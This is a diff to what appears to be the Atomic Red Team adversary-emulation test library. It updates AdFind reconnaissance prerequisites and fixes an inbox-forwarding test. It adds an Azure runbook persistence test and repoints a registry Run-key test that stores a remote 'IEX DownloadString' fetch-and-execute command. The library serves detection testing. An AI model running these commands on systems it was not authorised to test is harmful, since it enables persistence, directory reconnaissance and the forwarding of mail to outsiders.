@@ -84830,10 +85024,9 @@ discovery:
         prereq_command: 'if (Test-Path #{adfind_path}) {exit 0} else {exit 1}
 
           '
-        get_prereq_command: 'Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe"
-          -OutFile #{adfind_path}
-
-          '
+        get_prereq_command: |
+          New-Item -Type Directory (split-path #{adfind_path}) -ErrorAction ignore | Out-Null
+          Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path}
       executor:
         command: "#{adfind_path} -sc admincountdmp\n"
         name: command_prompt
@@ -84857,10 +85050,9 @@ discovery:
         prereq_command: 'if (Test-Path #{adfind_path}) {exit 0} else {exit 1}
 
           '
-        get_prereq_command: 'Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe"
-          -OutFile #{adfind_path}
-
-          '
+        get_prereq_command: |
+          New-Item -Type Directory (split-path #{adfind_path}) -ErrorAction ignore | Out-Null
+          Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path}
       executor:
         command: "#{adfind_path} -f (objectcategory=person)\n"
         name: command_prompt
@@ -84884,10 +85076,9 @@ discovery:
         prereq_command: 'if (Test-Path #{adfind_path}) {exit 0} else {exit 1}
 
           '
-        get_prereq_command: 'Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe"
-          -OutFile #{adfind_path}
-
-          '
+        get_prereq_command: |
+          New-Item -Type Directory (split-path #{adfind_path}) -ErrorAction ignore | Out-Null
+          Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path}
       executor:
         command: "#{adfind_path} -sc exchaddresses\n"
         name: command_prompt
@@ -85729,6 +85920,7 @@ discovery:
           '
         get_prereq_command: |
           [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+          New-Item -Type Directory (split-path #{adfind_path}) -ErrorAction ignore | Out-Null
           Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path}
       executor:
         command: "#{adfind_path} -f (objectcategory=group)\n"
@@ -87951,10 +88143,9 @@ discovery:
         prereq_command: 'if (Test-Path #{adfind_path}) {exit 0} else {exit 1}
 
           '
-        get_prereq_command: 'Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe"
-          -OutFile #{adfind_path}
-
-          '
+        get_prereq_command: |
+          New-Item -Type Directory (split-path #{adfind_path}) -ErrorAction ignore | Out-Null
+          Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path}
       executor:
         command: "#{adfind_path} -f (objectcategory=subnet)\n"
         name: command_prompt
@@ -88244,10 +88435,9 @@ discovery:
         prereq_command: 'if (Test-Path #{adfind_path}) {exit 0} else {exit 1}
 
           '
-        get_prereq_command: 'Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe"
-          -OutFile #{adfind_path}
-
-          '
+        get_prereq_command: |
+          New-Item -Type Directory (split-path #{adfind_path}) -ErrorAction ignore | Out-Null
+          Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path}
       executor:
         command: "#{adfind_path} -f (objectcategory=organizationalUnit)\n"
         name: command_prompt
@@ -88271,10 +88461,9 @@ discovery:
         prereq_command: 'if (Test-Path #{adfind_path}) {exit 0} else {exit 1}
 
           '
-        get_prereq_command: 'Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe"
-          -OutFile #{adfind_path}
-
-          '
+        get_prereq_command: |
+          New-Item -Type Directory (split-path #{adfind_path}) -ErrorAction ignore | Out-Null
+          Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path}
       executor:
         command: "#{adfind_path} -gcb -sc trustdmp\n"
         name: command_prompt
@@ -90527,10 +90716,9 @@ discovery:
         prereq_command: 'if (Test-Path #{adfind_path}) {exit 0} else {exit 1}
 
           '
-        get_prereq_command: 'Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe"
-          -OutFile #{adfind_path}
-
-          '
+        get_prereq_command: |
+          New-Item -Type Directory (split-path #{adfind_path}) -ErrorAction ignore | Out-Null
+          Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path}
       executor:
         command: "#{adfind_path} -f (objectcategory=computer)\n"
         name: command_prompt
@@ -90554,10 +90742,9 @@ discovery:
         prereq_command: 'if (Test-Path #{adfind_path}) {exit 0} else {exit 1}
 
           '
-        get_prereq_command: 'Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe"
-          -OutFile #{adfind_path}
-
-          '
+        get_prereq_command: |
+          New-Item -Type Directory (split-path #{adfind_path}) -ErrorAction ignore | Out-Null
+          Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path}
       executor:
         command: "#{adfind_path} -sc dclist\n"
         name: command_prompt
@@ -104421,6 +104608,55 @@ initial-access:
           this atomic test : https://cloud.google.com/sdk/docs/install"
 
           '
+    - name: Azure Persistence Automation Runbook Created or Modified
+      auto_generated_guid: 348f4d14-4bd3-4f6b-bd8a-61237f78b3ac
+      description: |
+        Identifies when an Azure Automation runbook is created or modified. An adversary may create or modify an Azure
+        Automation runbook to execute malicious code and maintain persistence in their target's environment.
+      supported_platforms:
+      - iaas:azure
+      input_arguments:
+        username:
+          description: Azure username
+          type: String
+          default: 
+        password:
+          description: Azure password
+          type: String
+          default: 
+        resource_group:
+          description: Name of the resource group
+          type: String
+          default: 
+        runbook_name:
+          description: Name of the runbook name
+          type: String
+          default: 
+        automation_account_name:
+          description: Name of the automation account name
+          type: String
+          default: 
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'Install-Module -Name Az
+
+          '
+        prereq_command: 'try {if (Get-InstalledModule -Name Az -ErrorAction SilentlyContinue)
+          {exit 0} else {exit 1}} catch {exit 1}
+
+          '
+        get_prereq_command: 'Install-Module -Name Az -Scope CurrentUser -Force
+
+          '
+      executor:
+        command: |
+          $secure_pwd = "#{password}" | ConvertTo-SecureString -AsPlainText -Force
+          $creds = New-Object System.Management.Automation.PSCredential -ArgumentList "#{username}", $secure_pwd
+          Connect-AzAccount -Credential $creds
+          New-AzAutomationRunbook -Name #{runbook_name} -Type PowerShell -ResourceGroupName #{resource_group} -Description 'my-test-runbook' -AutomationAccountName #{automation_account_name}
+          Remove-AzAutomationRunbook -AutomationAccountName #{automation_account_name} -Name #{runbook_name} -ResourceGroupName #{resource_group} -Force
+        name: powershell
+        elevation_required: false
   T1566.003:
     technique:
       x_mitre_platforms:

atomics/Indexes/office-365-index.yaml

@@ -42069,7 +42069,7 @@ collection:
           $secure_pwd = "#{password}" | ConvertTo-SecureString -AsPlainText -Force
           $creds = New-Object System.Management.Automation.PSCredential -ArgumentList "#{username}", $secure_pwd
           Connect-ExchangeOnline -Credential $creds
-          New-InboxRule -Name "#{rule_name}" -ForwardTo "{#forwarding_email}"
+          New-InboxRule -Name "#{rule_name}" -ForwardTo "#{forwarding_email}"
         cleanup_command: |
           $secure_pwd = "#{password}" | ConvertTo-SecureString -AsPlainText -Force
           $creds = New-Object System.Management.Automation.PSCredential -ArgumentList "#{username}", $secure_pwd

atomics/Indexes/windows-index.yaml

@@ -33011,7 +33011,7 @@ privilege-escalation:
       executor:
         command: |
           $RunOnceKey = "#{reg_key_path}"
-          set-itemproperty $RunOnceKey "NextRun" '#{thing_to_execute} "IEX (New-Object Net.WebClient).DownloadString(`"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/36f83b728bc26a49eacb0535edc42be8c377ac54/ARTifacts/Misc/Discovery.bat`")"'
+          set-itemproperty $RunOnceKey "NextRun" '#{thing_to_execute} "IEX (New-Object Net.WebClient).DownloadString(`"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1547.001/src/Discovery.bat`")"'
         cleanup_command: 'Remove-ItemProperty -Path #{reg_key_path} -Name "NextRun"
           -Force -ErrorAction Ignore
 
@@ -33061,7 +33061,8 @@ privilege-escalation:
     - name: Suspicious bat file run from startup Folder
       auto_generated_guid: 5b6768e4-44d2-44f0-89da-a01d1430fd5e
       description: |
-        bat files can be placed in and executed from the startup folder to maintain persistance.
+        bat files can be placed in and executed from the startup folder to maintain persistance
+
         Upon execution, cmd will be run and immediately closed. Additionally, the new files can be viewed in the "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup"
         folder and will also run when the computer is restarted and the user logs in.
       supported_platforms:
@@ -53421,7 +53422,7 @@ persistence:
       executor:
         command: |
           $RunOnceKey = "#{reg_key_path}"
-          set-itemproperty $RunOnceKey "NextRun" '#{thing_to_execute} "IEX (New-Object Net.WebClient).DownloadString(`"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/36f83b728bc26a49eacb0535edc42be8c377ac54/ARTifacts/Misc/Discovery.bat`")"'
+          set-itemproperty $RunOnceKey "NextRun" '#{thing_to_execute} "IEX (New-Object Net.WebClient).DownloadString(`"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1547.001/src/Discovery.bat`")"'
         cleanup_command: 'Remove-ItemProperty -Path #{reg_key_path} -Name "NextRun"
           -Force -ErrorAction Ignore
 
@@ -53471,7 +53472,8 @@ persistence:
     - name: Suspicious bat file run from startup Folder
       auto_generated_guid: 5b6768e4-44d2-44f0-89da-a01d1430fd5e
       description: |
-        bat files can be placed in and executed from the startup folder to maintain persistance.
+        bat files can be placed in and executed from the startup folder to maintain persistance
+
         Upon execution, cmd will be run and immediately closed. Additionally, the new files can be viewed in the "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup"
         folder and will also run when the computer is restarted and the user logs in.
       supported_platforms:
@@ -74088,10 +74090,9 @@ discovery:
         prereq_command: 'if (Test-Path #{adfind_path}) {exit 0} else {exit 1}
 
           '
-        get_prereq_command: 'Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe"
-          -OutFile #{adfind_path}
-
-          '
+        get_prereq_command: |
+          New-Item -Type Directory (split-path #{adfind_path}) -ErrorAction ignore | Out-Null
+          Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path}
       executor:
         command: "#{adfind_path} -default -s base lockoutduration lockoutthreshold
           lockoutobservationwindow maxpwdage minpwdage minpwdlength pwdhistorylength
@@ -74117,10 +74118,9 @@ discovery:
         prereq_command: 'if (Test-Path #{adfind_path}) {exit 0} else {exit 1}
 
           '
-        get_prereq_command: 'Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe"
-          -OutFile #{adfind_path}
-
-          '
+        get_prereq_command: |
+          New-Item -Type Directory (split-path #{adfind_path}) -ErrorAction ignore | Out-Null
+          Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path}
       executor:
         command: "#{adfind_path} -sc admincountdmp\n"
         name: command_prompt
@@ -74144,10 +74144,9 @@ discovery:
         prereq_command: 'if (Test-Path #{adfind_path}) {exit 0} else {exit 1}
 
           '
-        get_prereq_command: 'Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe"
-          -OutFile #{adfind_path}
-
-          '
+        get_prereq_command: |
+          New-Item -Type Directory (split-path #{adfind_path}) -ErrorAction ignore | Out-Null
+          Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path}
       executor:
         command: "#{adfind_path} -f (objectcategory=person)\n"
         name: command_prompt
@@ -74171,10 +74170,9 @@ discovery:
         prereq_command: 'if (Test-Path #{adfind_path}) {exit 0} else {exit 1}
 
           '
-        get_prereq_command: 'Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe"
-          -OutFile #{adfind_path}
-
-          '
+        get_prereq_command: |
+          New-Item -Type Directory (split-path #{adfind_path}) -ErrorAction ignore | Out-Null
+          Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path}
       executor:
         command: "#{adfind_path} -sc exchaddresses\n"
         name: command_prompt
@@ -74842,6 +74840,7 @@ discovery:
           '
         get_prereq_command: |
           [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+          New-Item -Type Directory (split-path #{adfind_path}) -ErrorAction ignore | Out-Null
           Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path}
       executor:
         command: "#{adfind_path} -f (objectcategory=group)\n"
@@ -76343,10 +76342,9 @@ discovery:
         prereq_command: 'if (Test-Path #{adfind_path}) {exit 0} else {exit 1}
 
           '
-        get_prereq_command: 'Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe"
-          -OutFile #{adfind_path}
-
-          '
+        get_prereq_command: |
+          New-Item -Type Directory (split-path #{adfind_path}) -ErrorAction ignore | Out-Null
+          Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path}
       executor:
         command: "#{adfind_path} -f (objectcategory=subnet)\n"
         name: command_prompt
@@ -76616,10 +76614,9 @@ discovery:
         prereq_command: 'if (Test-Path #{adfind_path}) {exit 0} else {exit 1}
 
           '
-        get_prereq_command: 'Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe"
-          -OutFile #{adfind_path}
-
-          '
+        get_prereq_command: |
+          New-Item -Type Directory (split-path #{adfind_path}) -ErrorAction ignore | Out-Null
+          Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path}
       executor:
         command: "#{adfind_path} -f (objectcategory=organizationalUnit)\n"
         name: command_prompt
@@ -76643,10 +76640,9 @@ discovery:
         prereq_command: 'if (Test-Path #{adfind_path}) {exit 0} else {exit 1}
 
           '
-        get_prereq_command: 'Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe"
-          -OutFile #{adfind_path}
-
-          '
+        get_prereq_command: |
+          New-Item -Type Directory (split-path #{adfind_path}) -ErrorAction ignore | Out-Null
+          Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path}
       executor:
         command: "#{adfind_path} -gcb -sc trustdmp\n"
         name: command_prompt
@@ -78428,10 +78424,9 @@ discovery:
         prereq_command: 'if (Test-Path #{adfind_path}) {exit 0} else {exit 1}
 
           '
-        get_prereq_command: 'Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe"
-          -OutFile #{adfind_path}
-
-          '
+        get_prereq_command: |
+          New-Item -Type Directory (split-path #{adfind_path}) -ErrorAction ignore | Out-Null
+          Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path}
       executor:
         command: "#{adfind_path} -f (objectcategory=computer)\n"
         name: command_prompt
@@ -78455,10 +78450,9 @@ discovery:
         prereq_command: 'if (Test-Path #{adfind_path}) {exit 0} else {exit 1}
 
           '
-        get_prereq_command: 'Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe"
-          -OutFile #{adfind_path}
-
-          '
+        get_prereq_command: |
+          New-Item -Type Directory (split-path #{adfind_path}) -ErrorAction ignore | Out-Null
+          Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path}
       executor:
         command: "#{adfind_path} -sc dclist\n"
         name: command_prompt

atomics/T1016/T1016.md

@@ -288,6 +288,7 @@ if (Test-Path #{adfind_path}) {exit 0} else {exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell
+New-Item -Type Directory (split-path #{adfind_path}) -ErrorAction ignore | Out-Null
 Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path}
 ```
 

atomics/T1016/T1016.yaml

@@ -149,6 +149,7 @@ atomic_tests:
     prereq_command: |
       if (Test-Path #{adfind_path}) {exit 0} else {exit 1}
     get_prereq_command: |
+      New-Item -Type Directory (split-path #{adfind_path}) -ErrorAction ignore | Out-Null
       Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path}
   executor:
     command: |

atomics/T1018/T1018.md

@@ -433,6 +433,7 @@ if (Test-Path #{adfind_path}) {exit 0} else {exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell
+New-Item -Type Directory (split-path #{adfind_path}) -ErrorAction ignore | Out-Null
 Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path}
 ```
 
@@ -479,6 +480,7 @@ if (Test-Path #{adfind_path}) {exit 0} else {exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell
+New-Item -Type Directory (split-path #{adfind_path}) -ErrorAction ignore | Out-Null
 Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path}
 ```
 

atomics/T1018/T1018.yaml

@@ -210,6 +210,7 @@ atomic_tests:
     prereq_command: |
       if (Test-Path #{adfind_path}) {exit 0} else {exit 1}
     get_prereq_command: |
+      New-Item -Type Directory (split-path #{adfind_path}) -ErrorAction ignore | Out-Null
       Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path}
   executor:
     command: |
@@ -234,6 +235,7 @@ atomic_tests:
     prereq_command: |
       if (Test-Path #{adfind_path}) {exit 0} else {exit 1}
     get_prereq_command: |
+      New-Item -Type Directory (split-path #{adfind_path}) -ErrorAction ignore | Out-Null
       Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path}
   executor:
     command: |

atomics/T1069.002/T1069.002.md

@@ -312,6 +312,7 @@ if (Test-Path #{adfind_path}) {exit 0} else {exit 1}
 ##### Get Prereq Commands:
 ```powershell
 [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+New-Item -Type Directory (split-path #{adfind_path}) -ErrorAction ignore | Out-Null
 Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path}
 ```
 

atomics/T1069.002/T1069.002.yaml

@@ -128,6 +128,7 @@ atomic_tests:
       if (Test-Path #{adfind_path}) {exit 0} else {exit 1}
     get_prereq_command: |
       [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+      New-Item -Type Directory (split-path #{adfind_path}) -ErrorAction ignore | Out-Null
       Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path}
   executor:
     command: |

atomics/T1078.004/T1078.004.md

@@ -10,6 +10,8 @@ Once a cloud account is compromised, an adversary may perform [Account Manipulat
 
 - [Atomic Test #1 - Creating GCP Service Account and Service Account Key](#atomic-test-1---creating-gcp-service-account-and-service-account-key)
 
+- [Atomic Test #2 - Azure Persistence Automation Runbook Created or Modified](#atomic-test-2---azure-persistence-automation-runbook-created-or-modified)
+
 
 <br/>
 
@@ -65,4 +67,58 @@ echo "Please Install Google Cloud SDK before running this atomic test : https://
 
 
 
+<br/>
+<br/>
+
+## Atomic Test #2 - Azure Persistence Automation Runbook Created or Modified
+Identifies when an Azure Automation runbook is created or modified. An adversary may create or modify an Azure
+Automation runbook to execute malicious code and maintain persistence in their target's environment.
+
+**Supported Platforms:** Iaas:azure
+
+
+**auto_generated_guid:** 348f4d14-4bd3-4f6b-bd8a-61237f78b3ac
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| username | Azure username | String | |
+| password | Azure password | String | |
+| resource_group | Name of the resource group | String | |
+| runbook_name | Name of the runbook name | String | |
+| automation_account_name | Name of the automation account name | String | |
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+$secure_pwd = "#{password}" | ConvertTo-SecureString -AsPlainText -Force
+$creds = New-Object System.Management.Automation.PSCredential -ArgumentList "#{username}", $secure_pwd
+Connect-AzAccount -Credential $creds
+New-AzAutomationRunbook -Name #{runbook_name} -Type PowerShell -ResourceGroupName #{resource_group} -Description 'my-test-runbook' -AutomationAccountName #{automation_account_name}
+Remove-AzAutomationRunbook -AutomationAccountName #{automation_account_name} -Name #{runbook_name} -ResourceGroupName #{resource_group} -Force
+```
+
+
+
+
+#### Dependencies:  Run with `powershell`!
+##### Description: Install-Module -Name Az
+##### Check Prereq Commands:
+```powershell
+try {if (Get-InstalledModule -Name Az -ErrorAction SilentlyContinue) {exit 0} else {exit 1}} catch {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+Install-Module -Name Az -Scope CurrentUser -Force
+```
+
+
+
+
 <br/>

atomics/T1078.004/T1078.004.yaml

@@ -6,7 +6,6 @@ atomic_tests:
   auto_generated_guid: 9fdd83fd-bd53-46e5-a716-9dec89c8ae8e
   description: |
     GCP Service Accounts can be used to gain intial access as well as maintain persistence inside Google Cloud.
-
   supported_platforms:
   - google-workspace
   - iaas:gcp
@@ -42,7 +41,6 @@ atomic_tests:
       gcloud iam service-accounts keys create #{output-key-file} --iam-account=#{service-account-email}
     cleanup_command: |
       gcloud iam service-accounts delete #{service-account-email} --quiet
-
   dependency_executor_name: sh
   dependencies:
   - description: |
@@ -51,3 +49,48 @@ atomic_tests:
       if [ -x "$(command -v gcloud)" ]; then exit 0; else exit 1; fi;
     get_prereq_command: |
       echo "Please Install Google Cloud SDK before running this atomic test : https://cloud.google.com/sdk/docs/install"
+- name: Azure Persistence Automation Runbook Created or Modified
+  auto_generated_guid: 348f4d14-4bd3-4f6b-bd8a-61237f78b3ac
+  description: |
+    Identifies when an Azure Automation runbook is created or modified. An adversary may create or modify an Azure
+    Automation runbook to execute malicious code and maintain persistence in their target's environment.
+  supported_platforms:
+  - iaas:azure
+  input_arguments:
+    username:
+      description: Azure username
+      type: String
+      default: null
+    password:
+      description: Azure password
+      type: String
+      default: null
+    resource_group:
+      description: Name of the resource group
+      type: String
+      default: null
+    runbook_name:
+      description: Name of the runbook name
+      type: String
+      default: null
+    automation_account_name:
+      description: Name of the automation account name
+      type: String
+      default: null
+  dependency_executor_name: powershell
+  dependencies:
+  - description: |
+      Install-Module -Name Az
+    prereq_command: |
+      try {if (Get-InstalledModule -Name Az -ErrorAction SilentlyContinue) {exit 0} else {exit 1}} catch {exit 1}
+    get_prereq_command: |
+      Install-Module -Name Az -Scope CurrentUser -Force
+  executor:
+    command: |
+      $secure_pwd = "#{password}" | ConvertTo-SecureString -AsPlainText -Force
+      $creds = New-Object System.Management.Automation.PSCredential -ArgumentList "#{username}", $secure_pwd
+      Connect-AzAccount -Credential $creds
+      New-AzAutomationRunbook -Name #{runbook_name} -Type PowerShell -ResourceGroupName #{resource_group} -Description 'my-test-runbook' -AutomationAccountName #{automation_account_name}
+      Remove-AzAutomationRunbook -AutomationAccountName #{automation_account_name} -Name #{runbook_name} -ResourceGroupName #{resource_group} -Force
+    name: powershell
+    elevation_required: false

atomics/T1087.002/T1087.002.md

@@ -224,6 +224,7 @@ if (Test-Path #{adfind_path}) {exit 0} else {exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell
+New-Item -Type Directory (split-path #{adfind_path}) -ErrorAction ignore | Out-Null
 Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path}
 ```
 
@@ -270,6 +271,7 @@ if (Test-Path #{adfind_path}) {exit 0} else {exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell
+New-Item -Type Directory (split-path #{adfind_path}) -ErrorAction ignore | Out-Null
 Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path}
 ```
 
@@ -316,6 +318,7 @@ if (Test-Path #{adfind_path}) {exit 0} else {exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell
+New-Item -Type Directory (split-path #{adfind_path}) -ErrorAction ignore | Out-Null
 Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path}
 ```
 
@@ -362,6 +365,7 @@ if (Test-Path #{adfind_path}) {exit 0} else {exit 1}
 ```
 ##### Get Prereq Commands:
 ```powershell
+New-Item -Type Directory (split-path #{adfind_path}) -ErrorAction ignore | Out-Null
 Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path}
 ```
 

atomics/T1087.002/T1087.002.yaml

@@ -86,6 +86,7 @@ atomic_tests:
     prereq_command: |
       if (Test-Path #{adfind_path}) {exit 0} else {exit 1}
     get_prereq_command: |
+      New-Item -Type Directory (split-path #{adfind_path}) -ErrorAction ignore | Out-Null
       Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path}
   executor:
     command: |
@@ -110,6 +111,7 @@ atomic_tests:
     prereq_command: |
       if (Test-Path #{adfind_path}) {exit 0} else {exit 1}
     get_prereq_command: |
+      New-Item -Type Directory (split-path #{adfind_path}) -ErrorAction ignore | Out-Null
       Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path}
   executor:
     command: |
@@ -134,6 +136,7 @@ atomic_tests:
     prereq_command: |
       if (Test-Path #{adfind_path}) {exit 0} else {exit 1}
     get_prereq_command: |
+      New-Item -Type Directory (split-path #{adfind_path}) -ErrorAction ignore | Out-Null
       Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path}
   executor:
     command: |
@@ -158,6 +161,7 @@ atomic_tests:
     prereq_command: |
       if (Test-Path #{adfind_path}) {exit 0} else {exit 1}
     get_prereq_command: |
+      New-Item -Type Directory (split-path #{adfind_path}) -ErrorAction ignore | Out-Null
       Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path}
   executor:
     command: |

atomics/T1114.003/T1114.003.md

@@ -39,7 +39,7 @@ Creates a new Inbox Rule to forward emails to an external user via the "ForwardT
 $secure_pwd = "#{password}" | ConvertTo-SecureString -AsPlainText -Force
 $creds = New-Object System.Management.Automation.PSCredential -ArgumentList "#{username}", $secure_pwd
 Connect-ExchangeOnline -Credential $creds
-New-InboxRule -Name "#{rule_name}" -ForwardTo "{#forwarding_email}"
+New-InboxRule -Name "#{rule_name}" -ForwardTo "#{forwarding_email}"
 ```
 
 #### Cleanup Commands:

atomics/T1114.003/T1114.003.yaml

@@ -40,7 +40,7 @@ atomic_tests:
       $secure_pwd = "#{password}" | ConvertTo-SecureString -AsPlainText -Force
       $creds = New-Object System.Management.Automation.PSCredential -ArgumentList "#{username}", $secure_pwd
       Connect-ExchangeOnline -Credential $creds
-      New-InboxRule -Name "#{rule_name}" -ForwardTo "{#forwarding_email}"
+      New-InboxRule -Name "#{rule_name}" -ForwardTo "#{forwarding_email}"
     cleanup_command: |
       $secure_pwd = "#{password}" | ConvertTo-SecureString -AsPlainText -Force
       $creds = New-Object System.Management.Automation.PSCredential -ArgumentList "#{username}", $secure_pwd

atomics/T1136.003/T1136.003.md

@@ -8,7 +8,9 @@ Adversaries may create accounts that only have access to specific cloud services
 
 - [Atomic Test #1 - AWS - Create a new IAM user](#atomic-test-1---aws---create-a-new-iam-user)
 
-- [Atomic Test #2 - Azure AD - Create a new use](#atomic-test-2---azure-ad---create-a-new-use)
+- [Atomic Test #2 - Azure AD - Create a new user](#atomic-test-2---azure-ad---create-a-new-user)
+
